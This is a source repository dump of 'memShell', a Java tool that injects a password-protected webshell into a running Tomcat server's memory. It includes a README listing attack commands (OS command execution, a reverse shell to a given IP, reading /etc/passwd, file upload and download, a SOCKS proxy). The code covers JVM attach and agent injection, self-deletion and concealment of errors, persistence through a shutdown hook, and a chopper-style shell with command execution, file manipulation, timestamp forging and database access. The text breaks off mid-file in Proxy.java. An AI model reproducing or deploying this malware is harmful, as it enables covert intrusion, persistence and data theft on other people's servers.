├── .classpath ├── .fatjar ├── .project ├── .settings ├── org.eclipse.jdt.core.prefs └── org.eclipse.m2e.core.prefs ├── README.md ├── pom.xml └── src ├── META-INF └── MANIFEST.MF ├── net └── rebeyond │ └── memshell │ ├── Agent.java │ ├── Attach.java │ ├── Evaluate.java │ ├── Proxy.java │ ├── Shell.java │ ├── Transformer.java │ └── redefine │ ├── MyRequest.java │ ├── MyResponse.java │ ├── MyServletContext.java │ ├── MyServletInputStream.java │ ├── MyServletOutputStream.java │ └── MySession.java ├── other └── forcedelete.exe └── source.txt /.classpath: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /.fatjar: -------------------------------------------------------------------------------- 1 | #Fat Jar Configuration File 2 | #Wed May 23 12:38:25 CST 2018 3 | onejar.license.required=true 4 | manifest.classpath= 5 | manifest.removesigners=true 6 | onejar.checkbox=false 7 | jarname=E\:/agent.jar 8 | manifest.mergeall=true 9 | manifest.mainclass=Attach 10 | manifest.file=src\\META-INF\\MANIFEST.MF 11 | jarname.isextern=true 12 | onejar.expand= 13 | excludes=;;;;;;;;;;;;;;;;;;;;; 14 | includes= 15 | -------------------------------------------------------------------------------- /.project: -------------------------------------------------------------------------------- 1 | 2 | 3 | memShell 4 | 5 | 6 | 7 | 8 | 9 | org.eclipse.jdt.core.javabuilder 10 | 11 | 12 | 13 | 14 | org.eclipse.m2e.core.maven2Builder 15 | 16 | 17 | 18 | 19 | 20 | org.eclipse.m2e.core.maven2Nature 21 | org.eclipse.jdt.core.javanature 22 | 23 | 24 | -------------------------------------------------------------------------------- /.settings/org.eclipse.jdt.core.prefs: -------------------------------------------------------------------------------- 1 | eclipse.preferences.version=1 2 | org.eclipse.jdt.core.compiler.codegen.inlineJsrBytecode=enabled 3 | org.eclipse.jdt.core.compiler.codegen.targetPlatform=1.6 4 | org.eclipse.jdt.core.compiler.codegen.unusedLocal=preserve 5 | org.eclipse.jdt.core.compiler.compliance=1.6 6 | org.eclipse.jdt.core.compiler.debug.lineNumber=generate 7 | org.eclipse.jdt.core.compiler.debug.localVariable=generate 8 | org.eclipse.jdt.core.compiler.debug.sourceFile=generate 9 | org.eclipse.jdt.core.compiler.problem.assertIdentifier=error 10 | org.eclipse.jdt.core.compiler.problem.enumIdentifier=error 11 | org.eclipse.jdt.core.compiler.problem.forbiddenReference=warning 12 | org.eclipse.jdt.core.compiler.source=1.6 13 | -------------------------------------------------------------------------------- /.settings/org.eclipse.m2e.core.prefs: -------------------------------------------------------------------------------- 1 | activeProfiles= 2 | eclipse.preferences.version=1 3 | resolveWorkspaceProjects=true 4 | version=1 5 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # memShell 2 | a webshell resides in the memory of java web server 3 | 4 | # install 5 | * unzip memShell.zip 6 | * cd memShell 7 | * java -jar inject.jar 8 | # usage 9 | * anyurl?pass_the_world=pass //show this help page. 10 | * anyurl?pass_the_world=pass&model=exec&cmd=whoami //run os command. 11 | * anyurl?pass_the_world=pass&model=connectback&ip=8.8.8.8&port=51 //reverse a shell back to 8.8.8.8 on port 51. 12 | * anyurl?pass_the_world=pass&model=urldownload&url=http://xxx.com/test.pdf&path=/tmp/test.pdf //download a remote file via the victim's network directly. 13 | * anyurl?pass_the_world=pass&model=list[del|show]&path=/etc/passwd //list,delete,show the specified path or file. 14 | * anyurl?pass_the_world=pass&model=download&path=/etc/passwd //download the specified file on the victim's disk. 15 | * anyurl?pass_the_world=pass&model=upload&path=/tmp/a.elf&content=this_is_content[&type=b] //upload a text file or a base64 encoded binary file to the victim's disk. 16 | * anyurl?pass_the_world=pass&model=proxy //start a socks proxy server on the victim. 17 | * anyurl?pass_the_world=pass&model=chopper //start a chopper server agent on the victim. 18 | 19 | **!!!It is recommended to use the POST method to submit data.** 20 | 21 | # note 22 | For learning exchanges only, do not use for illegal purposes.by rebeyond. 23 | -------------------------------------------------------------------------------- /pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 4.0.0 3 | ParaShell 4 | ParaShell 5 | 0.0.1-SNAPSHOT 6 | 7 | src 8 | 9 | 10 | maven-compiler-plugin 11 | 3.6.1 12 | 13 | 1.6 14 | 1.6 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | org.javassist 23 | javassist 24 | 3.22.0-GA 25 | 26 | 27 | -------------------------------------------------------------------------------- /src/META-INF/MANIFEST.MF: -------------------------------------------------------------------------------- 1 | Manifest-Version: 1.0 2 | Agent-Class: net.rebeyond.memshell.Agent 3 | Can-Retransform-Classes: true -------------------------------------------------------------------------------- /src/net/rebeyond/memshell/Agent.java: -------------------------------------------------------------------------------- 1 | package net.rebeyond.memshell; 2 | import java.io.BufferedReader; 3 | import java.io.File; 4 | import java.io.FileInputStream; 5 | import java.io.FileOutputStream; 6 | import java.io.InputStream; 7 | import java.io.InputStreamReader; 8 | import java.lang.instrument.Instrumentation; 9 | import java.lang.management.ManagementFactory; 10 | import java.lang.management.RuntimeMXBean; 11 | import java.net.HttpURLConnection; 12 | import java.net.InetAddress; 13 | import java.net.URL; 14 | import java.util.Arrays; 15 | import java.util.Set; 16 | 17 | import javax.management.MBeanServer; 18 | import javax.management.ObjectName; 19 | import javax.management.Query; 20 | 21 | public class Agent { 22 | public static String className = "org.apache.catalina.core.ApplicationFilterChain"; 23 | public static byte[] injectFileBytes = new byte[] {}, agentFileBytes = new byte[] {}; 24 | public static String currentPath; 25 | public static String password = "rebeyond"; 26 | 27 | public static void agentmain(String agentArgs, Instrumentation inst) { 28 | inst.addTransformer(new Transformer(), true); 29 | if (agentArgs.indexOf("^") >= 0) { 30 | Agent.currentPath = agentArgs.split("\\^")[0]; 31 | Agent.password = agentArgs.split("\\^")[1]; 32 | } else { 33 | Agent.currentPath = agentArgs; 34 | } 35 | System.out.println("Agent Main Done"); 36 | Class[] loadedClasses = inst.getAllLoadedClasses(); 37 | for (Class c : loadedClasses) { 38 | if (c.getName().equals(className)) { 39 | try { 40 | inst.retransformClasses(c); 41 | } catch (Exception e) { 42 | // TODO Auto-generated catch block 43 | e.printStackTrace(); 44 | } 45 | } 46 | } 47 | 48 | try { 49 | initLoad(); 50 | readInjectFile(Agent.currentPath); 51 | readAgentFile(Agent.currentPath); 52 | clear(Agent.currentPath); 53 | } catch (Exception e) { 54 | // 为了隐蔽,不要打印异常信息 55 | } 56 | Agent.persist(); 57 | } 58 | 59 | public static void persist() { 60 | try { 61 | Thread t = new Thread() { 62 | public void run() { 63 | try { 64 | writeFiles("inject.jar", Agent.injectFileBytes); 65 | writeFiles("agent.jar", Agent.agentFileBytes); 66 | startInject(); 67 | } catch (Exception e) { 68 | 69 | } 70 | } 71 | }; 72 | t.setName("shutdown Thread"); 73 | Runtime.getRuntime().addShutdownHook(t); 74 | } catch (Throwable t) { 75 | 76 | } 77 | } 78 | 79 | public static void writeFiles(String fileName, byte[] data) throws Exception { 80 | String tempFolder = System.getProperty("java.io.tmpdir"); 81 | FileOutputStream fso = new FileOutputStream(tempFolder + File.separator + fileName); 82 | fso.write(data); 83 | fso.close(); 84 | } 85 | 86 | public static void readInjectFile(String filePath) throws Exception { 87 | String fileName = "inject.jar"; 88 | File f = new File(filePath + File.separator + fileName); 89 | if (!f.exists()) { 90 | f = new File(System.getProperty("java.io.tmpdir") + File.separator + fileName); 91 | } 92 | InputStream is = new FileInputStream(f); 93 | byte[] bytes = new byte[1024 * 100]; 94 | int num = 0; 95 | while ((num = is.read(bytes)) != -1) { 96 | injectFileBytes = mergeByteArray(injectFileBytes, Arrays.copyOfRange(bytes, 0, num)); 97 | } 98 | is.close(); 99 | } 100 | 101 | public static void readAgentFile(String filePath) throws Exception { 102 | String fileName = "agent.jar"; 103 | File f = new File(filePath + File.separator + fileName); 104 | if (!f.exists()) { 105 | f = new File(System.getProperty("java.io.tmpdir") + File.separator + fileName); 106 | } 107 | InputStream is = new FileInputStream(f); 108 | byte[] bytes = new byte[1024 * 100]; 109 | int num = 0; 110 | while ((num = is.read(bytes)) != -1) { 111 | agentFileBytes = mergeByteArray(agentFileBytes, Arrays.copyOfRange(bytes, 0, num)); 112 | } 113 | is.close(); 114 | } 115 | 116 | public static void startInject() throws Exception { 117 | Thread.sleep(2000); 118 | String tempFolder = System.getProperty("java.io.tmpdir"); 119 | String cmd = "java -jar " + tempFolder + File.separator + "inject.jar " + Agent.password; 120 | Runtime.getRuntime().exec(cmd); 121 | } 122 | 123 | public static void main(String[] args) { 124 | try { 125 | readAgentFile("e:/"); 126 | String tempPath = Attach.class.getProtectionDomain().getCodeSource().getLocation().getPath(); 127 | 128 | String agentFile = Attach.class.getProtectionDomain().getCodeSource().getLocation().getPath().substring(0, 129 | tempPath.lastIndexOf("/")); 130 | } catch (Exception e) { 131 | // TODO Auto-generated catch block 132 | e.printStackTrace(); 133 | } 134 | } 135 | 136 | static byte[] mergeByteArray(byte[]... byteArray) { 137 | int totalLength = 0; 138 | for (int i = 0; i < byteArray.length; i++) { 139 | if (byteArray[i] == null) { 140 | continue; 141 | } 142 | totalLength += byteArray[i].length; 143 | } 144 | 145 | byte[] result = new byte[totalLength]; 146 | int cur = 0; 147 | for (int i = 0; i < byteArray.length; i++) { 148 | if (byteArray[i] == null) { 149 | continue; 150 | } 151 | System.arraycopy(byteArray[i], 0, result, cur, byteArray[i].length); 152 | cur += byteArray[i].length; 153 | } 154 | 155 | return result; 156 | } 157 | 158 | public static void clear(String currentPath) throws Exception { 159 | Thread clearThread = new Thread() { 160 | String currentPath = Agent.currentPath; 161 | 162 | public void run() { 163 | try { 164 | Thread.sleep(5000); 165 | String injectFile = currentPath + "inject.jar"; 166 | String agentFile = currentPath + "agent.jar"; 167 | new File(injectFile).getCanonicalFile().delete(); 168 | String OS = System.getProperty("os.name").toLowerCase(); 169 | if (OS.indexOf("windows") >= 0) { 170 | try { 171 | unlockFile(currentPath); 172 | } catch (Exception e) { 173 | e.printStackTrace(); 174 | } 175 | } 176 | new File(agentFile).delete(); 177 | } catch (Exception e) { 178 | //pass 179 | } 180 | } 181 | }; 182 | clearThread.start(); 183 | 184 | } 185 | 186 | public static void unlockFile(String currentPath) throws Exception { 187 | String exePath = currentPath + "foreceDelete.exe"; 188 | InputStream is = Agent.class.getClassLoader().getResourceAsStream("other/forcedelete.exe"); 189 | FileOutputStream fos = new FileOutputStream(new File(exePath).getCanonicalPath()); 190 | byte[] bytes = new byte[1024 * 100]; 191 | int num = 0; 192 | while ((num = is.read(bytes)) != -1) { 193 | fos.write(bytes, 0, num); 194 | fos.flush(); 195 | } 196 | fos.close(); 197 | is.close(); 198 | Process process = java.lang.Runtime.getRuntime().exec(exePath + " " + getCurrentPid()); 199 | try { 200 | process.waitFor(); 201 | } catch (InterruptedException e) { 202 | // TODO Auto-generated catch block 203 | e.printStackTrace(); 204 | } 205 | new File(exePath).delete(); 206 | } 207 | 208 | public static String getCurrentPid() { 209 | RuntimeMXBean runtimeMXBean = ManagementFactory.getRuntimeMXBean(); 210 | return runtimeMXBean.getName().split("@")[0]; 211 | } 212 | 213 | public static void initLoad() throws Exception { 214 | try { 215 | MBeanServer beanServer = ManagementFactory.getPlatformMBeanServer(); 216 | Set objectNames = beanServer.queryNames(new ObjectName("*:type=Connector,*"), 217 | Query.match(Query.attr("protocol"), Query.value("HTTP/1.1"))); 218 | //String host = InetAddress.getLocalHost().getHostAddress(); 219 | String host = "127.0.0.1"; 220 | String port = objectNames.iterator().next().getKeyProperty("port"); 221 | String url = "http" + "://" + host + ":" + port; 222 | String[] models = new String[] { "model=exec&cmd=whoami", "model=proxy", "model=chopper", "model=list&path=.", 223 | "model=urldownload&url=https://www.baidu.com/robots.txt&path=not_exist:/not_exist" }; 224 | for (String model : models) { 225 | String address = url + "/robots.txt?" + "pass_the_world=" + Agent.password + "&" + model; 226 | openUrl(address); 227 | } 228 | } 229 | catch(Exception e) 230 | { 231 | //pass 232 | } 233 | } 234 | 235 | public static void openUrl(String address) throws Exception { 236 | URL url = new URL(address); 237 | HttpURLConnection urlcon = (HttpURLConnection) url.openConnection(); 238 | urlcon.connect(); // 获取连接 239 | InputStream is = urlcon.getInputStream(); 240 | BufferedReader buffer = new BufferedReader(new InputStreamReader(is)); 241 | StringBuffer bs = new StringBuffer(); 242 | String l = null; 243 | while ((l = buffer.readLine()) != null) { 244 | bs.append(l).append("\n"); 245 | } 246 | } 247 | } 248 | -------------------------------------------------------------------------------- /src/net/rebeyond/memshell/Attach.java: -------------------------------------------------------------------------------- 1 | package net.rebeyond.memshell; 2 | 3 | import java.io.File; 4 | import java.util.Iterator; 5 | import java.util.List; 6 | import java.util.Map.Entry; 7 | import java.util.Properties; 8 | 9 | import com.sun.tools.attach.VirtualMachine; 10 | import com.sun.tools.attach.VirtualMachineDescriptor; 11 | 12 | public class Attach { 13 | 14 | public static void main(String[] args) throws Exception { 15 | 16 | if (args.length != 1) { 17 | System.out.println("Usage:java -jar inject.jar password"); 18 | return; 19 | } 20 | VirtualMachine vm = null; 21 | List vmList = null; 22 | String password = args[0]; 23 | String currentPath = Attach.class.getProtectionDomain().getCodeSource().getLocation().getPath(); 24 | currentPath = currentPath.substring(0, currentPath.lastIndexOf("/") + 1); 25 | String agentFile = currentPath + "agent.jar"; 26 | agentFile = new File(agentFile).getCanonicalPath(); 27 | String agentArgs = currentPath; 28 | if (!password.equals("") || password != null) { 29 | agentArgs = agentArgs + "^" + password; 30 | } 31 | 32 | while (true) { 33 | try { 34 | vmList = VirtualMachine.list(); 35 | if (vmList.size() <= 0) 36 | continue; 37 | for (VirtualMachineDescriptor vmd : vmList) { 38 | if (vmd.displayName().indexOf("catalina") >= 0||vmd.displayName().equals("")) { 39 | vm = VirtualMachine.attach(vmd); 40 | 41 | //ADD for tomcat windows service,dispayname is blank string and has key "catalina.home". 42 | if (vmd.displayName().equals("")&&vm.getSystemProperties().containsKey("catalina.home")==false) 43 | continue; 44 | 45 | System.out.println("[+]OK.i find a jvm."); 46 | Thread.sleep(1000); 47 | if (null != vm) { 48 | vm.loadAgent(agentFile, agentArgs); 49 | System.out.println("[+]memeShell is injected."); 50 | vm.detach(); 51 | return; 52 | } 53 | } 54 | } 55 | Thread.sleep(3000); 56 | } catch (Exception e) { 57 | e.printStackTrace(); 58 | } 59 | } 60 | } 61 | } -------------------------------------------------------------------------------- /src/net/rebeyond/memshell/Evaluate.java: -------------------------------------------------------------------------------- 1 | package net.rebeyond.memshell; 2 | 3 | 4 | import java.io.BufferedInputStream; 5 | import java.io.BufferedReader; 6 | import java.io.BufferedWriter; 7 | import java.io.File; 8 | import java.io.FileInputStream; 9 | import java.io.FileOutputStream; 10 | import java.io.IOException; 11 | import java.io.InputStream; 12 | import java.io.InputStreamReader; 13 | import java.io.OutputStreamWriter; 14 | import java.io.PrintWriter; 15 | import java.net.HttpURLConnection; 16 | import java.net.URL; 17 | import java.sql.Connection; 18 | import java.sql.DriverManager; 19 | import java.sql.ResultSet; 20 | import java.sql.ResultSetMetaData; 21 | import java.sql.Statement; 22 | import java.text.SimpleDateFormat; 23 | 24 | 25 | import javax.servlet.ServletOutputStream; 26 | import javax.servlet.ServletRequest; 27 | import javax.servlet.ServletResponse; 28 | 29 | import net.rebeyond.memshell.redefine.MyRequest; 30 | import net.rebeyond.memshell.redefine.MyResponse; 31 | import net.rebeyond.memshell.redefine.MyServletContext; 32 | import net.rebeyond.memshell.redefine.MyServletOutputStream; 33 | 34 | public class Evaluate { 35 | 36 | private static final long serialVersionUID = 1L; 37 | 38 | String Pwd = "023"; 39 | String cs = "UTF-8"; 40 | 41 | String EC(String s) throws Exception { 42 | return new String(s.getBytes("ISO-8859-1"),cs); 43 | } 44 | 45 | Connection GC(String s) throws Exception { 46 | String[] x = s.trim().split("\r\n"); 47 | Class.forName(x[0].trim()); 48 | if(x[1].indexOf("jdbc:oracle")!=-1){ 49 | return DriverManager.getConnection(x[1].trim()+":"+x[4],x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]); 50 | }else{ 51 | Connection c = DriverManager.getConnection(x[1].trim(),x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]); 52 | if (x.length > 4) { 53 | c.setCatalog(x[4]); 54 | } 55 | return c; 56 | } 57 | } 58 | 59 | void AA(StringBuffer sb) throws Exception { 60 | File r[] = File.listRoots(); 61 | for (int i = 0; i < r.length; i++) { 62 | sb.append(r[i].toString().substring(0, 2)); 63 | } 64 | } 65 | 66 | void BB(String s, StringBuffer sb) throws Exception { 67 | File oF = new File(s), l[] = oF.listFiles(); 68 | String sT, sQ, sF = ""; 69 | java.util.Date dt; 70 | SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); 71 | for (int i = 0; i < l.length; i++) { 72 | dt = new java.util.Date(l[i].lastModified()); 73 | sT = fm.format(dt); 74 | sQ = l[i].canRead() ? "R" : ""; 75 | sQ += l[i].canWrite() ? " W" : ""; 76 | if (l[i].isDirectory()) { 77 | sb.append(l[i].getName() + "/\t" + sT + "\t" + l[i].length()+ "\t" + sQ + "\n"); 78 | } else { 79 | sF+=l[i].getName() + "\t" + sT + "\t" + l[i].length() + "\t"+ sQ + "\n"; 80 | } 81 | } 82 | sb.append(sF); 83 | } 84 | 85 | void EE(String s) throws Exception { 86 | File f = new File(s); 87 | if (f.isDirectory()) { 88 | File x[] = f.listFiles(); 89 | for (int k = 0; k < x.length; k++) { 90 | if (!x[k].delete()) { 91 | EE(x[k].getPath()); 92 | } 93 | } 94 | } 95 | f.delete(); 96 | } 97 | 98 | void FF(String s, ServletResponse r) throws Exception { 99 | int n; 100 | byte[] b = new byte[512]; 101 | //r.reset(); 102 | MyResponse.reset(r); 103 | //ServletOutputStream os = r.getOutputStream(); 104 | Object os = MyResponse.getOutputStream(r); 105 | BufferedInputStream is = new BufferedInputStream(new FileInputStream(s)); 106 | //os.write(("->" + "|").getBytes(), 0, 3); 107 | MyServletOutputStream.write(os,("->" + "|").getBytes(), 0, 3); 108 | while ((n = is.read(b, 0, 512)) != -1) { 109 | MyServletOutputStream.write(os,b, 0, n); 110 | } 111 | MyServletOutputStream.write(os,("|" + "<-").getBytes(), 0, 3); 112 | //os.close(); 113 | MyServletOutputStream.close(os); 114 | is.close(); 115 | } 116 | 117 | void GG(String s, String d) throws Exception { 118 | String h = "0123456789ABCDEF"; 119 | File f = new File(s); 120 | f.createNewFile(); 121 | FileOutputStream os = new FileOutputStream(f); 122 | for (int i = 0; i < d.length(); i += 2) { 123 | os.write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d.charAt(i + 1)))); 124 | } 125 | os.close(); 126 | } 127 | 128 | void HH(String s, String d) throws Exception { 129 | File sf = new File(s), df = new File(d); 130 | if (sf.isDirectory()) { 131 | if (!df.exists()) { 132 | df.mkdir(); 133 | } 134 | File z[] = sf.listFiles(); 135 | for (int j = 0; j < z.length; j++) { 136 | HH(s + "/" + z[j].getName(), d + "/" + z[j].getName()); 137 | } 138 | } else { 139 | FileInputStream is = new FileInputStream(sf); 140 | FileOutputStream os = new FileOutputStream(df); 141 | int n; 142 | byte[] b = new byte[512]; 143 | while ((n = is.read(b, 0, 512)) != -1) { 144 | os.write(b, 0, n); 145 | } 146 | is.close(); 147 | os.close(); 148 | } 149 | } 150 | 151 | void II(String s, String d) throws Exception { 152 | File sf = new File(s), df = new File(d); 153 | sf.renameTo(df); 154 | } 155 | 156 | void JJ(String s) throws Exception { 157 | File f = new File(s); 158 | f.mkdir(); 159 | } 160 | 161 | void KK(String s, String t) throws Exception { 162 | File f = new File(s); 163 | SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); 164 | java.util.Date dt = fm.parse(t); 165 | f.setLastModified(dt.getTime()); 166 | } 167 | 168 | void LL(String s, String d) throws Exception { 169 | URL u = new URL(s); 170 | int n = 0; 171 | FileOutputStream os = new FileOutputStream(d); 172 | HttpURLConnection h = (HttpURLConnection) u.openConnection(); 173 | InputStream is = h.getInputStream(); 174 | byte[] b = new byte[512]; 175 | while ((n = is.read(b)) != -1) { 176 | os.write(b, 0, n); 177 | } 178 | os.close(); 179 | is.close(); 180 | h.disconnect(); 181 | } 182 | 183 | void MM(InputStream is, StringBuffer sb) throws Exception { 184 | String l; 185 | BufferedReader br = new BufferedReader(new InputStreamReader(is)); 186 | while ((l = br.readLine()) != null) { 187 | sb.append(l + "\r\n"); 188 | } 189 | } 190 | 191 | void NN(String s, StringBuffer sb) throws Exception { 192 | Connection c = GC(s); 193 | ResultSet r = s.indexOf("jdbc:oracle")!=-1?c.getMetaData().getSchemas():c.getMetaData().getCatalogs(); 194 | while (r.next()) { 195 | sb.append(r.getString(1) + "\t"); 196 | } 197 | r.close(); 198 | c.close(); 199 | } 200 | 201 | void OO(String s, StringBuffer sb) throws Exception { 202 | Connection c = GC(s); 203 | String[] x = s.trim().split("\r\n"); 204 | ResultSet r = c.getMetaData().getTables(null,s.indexOf("jdbc:oracle")!=-1?x.length>5?x[5]:x[4]:null, "%", new String[]{"TABLE"}); 205 | while (r.next()) { 206 | sb.append(r.getString("TABLE_NAME") + "\t"); 207 | } 208 | r.close(); 209 | c.close(); 210 | } 211 | 212 | void PP(String s, StringBuffer sb) throws Exception { 213 | String[] x = s.trim().split("\r\n"); 214 | Connection c = GC(s); 215 | Statement m = c.createStatement(1005, 1007); 216 | ResultSet r = m.executeQuery("select * from " + x[x.length-1]); 217 | ResultSetMetaData d = r.getMetaData(); 218 | for (int i = 1; i <= d.getColumnCount(); i++) { 219 | sb.append(d.getColumnName(i) + " (" + d.getColumnTypeName(i)+ ")\t"); 220 | } 221 | r.close(); 222 | m.close(); 223 | c.close(); 224 | } 225 | 226 | void QQ(String cs, String s, String q, StringBuffer sb,String p) throws Exception { 227 | Connection c = GC(s); 228 | Statement m = c.createStatement(1005, 1008); 229 | BufferedWriter bw = null; 230 | try { 231 | ResultSet r = m.executeQuery(q.indexOf("--f:")!=-1?q.substring(0,q.indexOf("--f:")):q); 232 | ResultSetMetaData d = r.getMetaData(); 233 | int n = d.getColumnCount(); 234 | for (int i = 1; i <= n; i++) { 235 | sb.append(d.getColumnName(i) + "\t|\t"); 236 | } 237 | sb.append("\r\n"); 238 | if(q.indexOf("--f:")!=-1){ 239 | File file = new File(p); 240 | if(q.indexOf("-to:")==-1){ 241 | file.mkdir(); 242 | } 243 | bw = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(q.indexOf("-to:")!=-1?p.trim():p+q.substring(q.indexOf("--f:") + 4,q.length()).trim()),true),cs)); 244 | } 245 | while (r.next()) { 246 | for (int i = 1; i <= n; i++) { 247 | if(q.indexOf("--f:")!=-1){ 248 | bw.write(r.getObject(i)+""+"\t"); 249 | bw.flush(); 250 | }else{ 251 | sb.append(r.getObject(i)+"" + "\t|\t"); 252 | } 253 | } 254 | if(bw!=null){bw.newLine();} 255 | sb.append("\r\n"); 256 | } 257 | r.close(); 258 | if(bw!=null){bw.close();} 259 | } catch (Exception e) { 260 | sb.append("Result\t|\t\r\n"); 261 | try { 262 | m.executeUpdate(q); 263 | sb.append("Execute Successfully!\t|\t\r\n"); 264 | } catch (Exception ee) { 265 | sb.append(ee.toString() + "\t|\t\r\n"); 266 | } 267 | } 268 | m.close(); 269 | c.close(); 270 | } 271 | 272 | public void doGet(ServletRequest request, ServletResponse response) 273 | throws Exception { 274 | doPost(request, response); 275 | } 276 | 277 | public void doPost(ServletRequest request, ServletResponse response)throws Exception { 278 | //cs = request.getParameter("z0") != null ? request.getParameter("z0")+ "":cs; 279 | cs = MyRequest.getParameter(request, "z0") != null ? MyRequest.getParameter(request, "z0") + "":cs; 280 | //response.setContentType("text/html"); 281 | //response.setCharacterEncoding(cs); 282 | MyResponse.setContentType(response, "text/html"); 283 | MyResponse.setCharacterEncoding(response,cs); 284 | PrintWriter out = MyResponse.getWriter(response); 285 | StringBuffer sb = new StringBuffer(""); 286 | try { 287 | String Z = EC(MyRequest.getParameter(request, Pwd) + ""); 288 | String z1 = EC(MyRequest.getParameter(request, "z1") + ""); 289 | String z2 = EC(MyRequest.getParameter(request, "z2") + ""); 290 | sb.append("->" + "|"); 291 | Object obj=MyRequest.getServletContext(request); 292 | String s =MyServletContext.getRealPath(obj,"/"); 293 | if (Z.equals("A")) { 294 | sb.append(s + "\t"); 295 | if (!s.substring(0, 1).equals("/")) { 296 | AA(sb); 297 | } 298 | } else if (Z.equals("B")) { 299 | BB(z1, sb); 300 | } else if (Z.equals("C")) { 301 | String l = ""; 302 | BufferedReader br = new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1)))); 303 | while ((l = br.readLine()) != null) { 304 | sb.append(l + "\r\n"); 305 | } 306 | br.close(); 307 | } else if (Z.equals("D")) { 308 | BufferedWriter bw = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1)))); 309 | bw.write(z2); 310 | bw.close(); 311 | sb.append("1"); 312 | } else if (Z.equals("E")) { 313 | EE(z1); 314 | sb.append("1"); 315 | } else if (Z.equals("F")) { 316 | FF(z1, response); 317 | } else if (Z.equals("G")) { 318 | GG(z1, z2); 319 | sb.append("1"); 320 | } else if (Z.equals("H")) { 321 | HH(z1, z2); 322 | sb.append("1"); 323 | } else if (Z.equals("I")) { 324 | II(z1, z2); 325 | sb.append("1"); 326 | } else if (Z.equals("J")) { 327 | JJ(z1); 328 | sb.append("1"); 329 | } else if (Z.equals("K")) { 330 | KK(z1, z2); 331 | sb.append("1"); 332 | } else if (Z.equals("L")) { 333 | LL(z1, z2); 334 | sb.append("1"); 335 | } else if (Z.equals("M")) { 336 | String[] c = { z1.substring(2), z1.substring(0, 2), z2 }; 337 | Process p = Runtime.getRuntime().exec(c); 338 | MM(p.getInputStream(), sb); 339 | MM(p.getErrorStream(), sb); 340 | } else if (Z.equals("N")) { 341 | NN(z1, sb); 342 | } else if (Z.equals("O")) { 343 | OO(z1, sb); 344 | } else if (Z.equals("P")) { 345 | PP(z1, sb); 346 | } else if (Z.equals("Q")) { 347 | QQ(cs, z1, z2, sb,z2.indexOf("-to:")!=-1?z2.substring(z2.indexOf("-to:")+4,z2.length()):s.replaceAll("\\\\", "/")+"images/"); 348 | } 349 | } catch (Exception e) { 350 | sb.append("ERROR" + ":// " + e.toString()); 351 | } 352 | sb.append("|" + "<-"); 353 | out.print(sb.toString()); 354 | } 355 | 356 | } -------------------------------------------------------------------------------- /src/net/rebeyond/memshell/Proxy.java: -------------------------------------------------------------------------------- 1 | package net.rebeyond.memshell; 2 | import java.io.IOException; 3 | import java.net.InetSocketAddress; 4 | import java.net.UnknownHostException; 5 | import java.nio.ByteBuffer; 6 | import java.nio.channels.SocketChannel; 7 | 8 | import net.rebeyond.memshell.redefine.MyRequest; 9 | import net.rebeyond.memshell.redefine.MyResponse; 10 | import net.rebeyond.memshell.redefine.MyServletInputStream; 11 | import net.rebeyond.memshell.redefine.MyServletOutputStream; 12 | import net.rebeyond.memshell.redefine.MySession; 13 | 14 | public class Proxy { 15 | public void doProxy(Object request, Object response) throws Exception { 16 | Object httpSession = MyRequest.getSession(request); 17 | String cmd = MyRequest.getHeader(request, "X-CMD"); 18 | if (cmd != null) { 19 | MyResponse.setHeader(response, "X-STATUS", "OK"); 20 | if (cmd.compareTo("CONNECT") == 0) { 21 | try { 22 | String target = MyRequest.getHeader(request, "X-TARGET"); 23 | int port = Integer.parseInt(MyRequest.getHeader(request, "X-PORT")); 24 | SocketChannel socketChannel = SocketChannel.open(); 25 | socketChannel.connect(new InetSocketAddress(target, port)); 26 | socketChannel.configureBlocking(false); 27 | MySession.setAttribute(httpSession, "socket", socketChannel); 28 | MyResponse.setHeader(response, "X-STATUS", "OK"); 29 | } catch (UnknownHostException e) { 30 | System.out.println(e.getMessage()); 31 | MyResponse.setHeader(response, "X-ERROR", e.getMessage()); 32 | MyResponse.setHeader(response, "X-STATUS", "FAIL"); 33 | } catch (IOException e) { 34 | System.out.println(e.getMessage()); 35 | MyResponse.setHeader(response, "X-ERROR", e.getMessage()); 36 | MyResponse.setHeader(response, "X-STATUS", "FAIL"); 37 | 38 | } 39 | } else if (cmd.compareTo("DISCONNECT") == 0) { 40 | SocketChannel socketChannel = (SocketChannel) MySession.getAttribute(httpSession, "socket"); 41 | try { 42 | socketChannel.socket().close(); 43 | } catch (Exception ex) { 44 | System.out.println(ex.getMessage()); 45 | } 46 | MySession.invalidate(httpSession); 47 | } else if (cmd.compareTo("READ") == 0) { 48 | SocketChannel socketChannel = (SocketChannel) MySession.getAttribute(httpSession, "socket"); 49 | try { 50 | ByteBuffer buf = ByteBuffer.allocate(512); 51 | int bytesRead = socketChannel.read(buf); 52 | // ServletOutputStream so = response.getOutputStream(); 53 | Object so = MyResponse.getOutputStream(response); 54 | while (bytesRead > 0) { 55 | // so.write(buf.array(),0,bytesRead); 56 | // so.flush(); 57 | MyServletOutputStream.write(so, buf.array(), 0, bytesRead); 58 | MyServletOutputStream.flush(so); 59 | buf.clear(); 60 | bytesRead = socketChannel.read(buf); 61 | } 62 | // response.setHeader("X-STATUS", "OK"); 63 | MyResponse.setHeader(response, "X-STATUS", "OK"); 64 | // so.flush(); 65 | // so.close(); 66 | MyServletOutputStream.flush(so); 67 | MyServletOutputStream.close(so); 68 | 69 | } catch (Exception e) { 70 | System.out.println(e.getMessage()); 71 | MyResponse.setHeader(response, "X-ERROR", e.getMessage()); 72 | MyResponse.setHeader(response, "X-STATUS", "FAIL"); 73 | // socketChannel.socket().close(); 74 | } 75 | 76 | } else if (cmd.compareTo("FORWARD") == 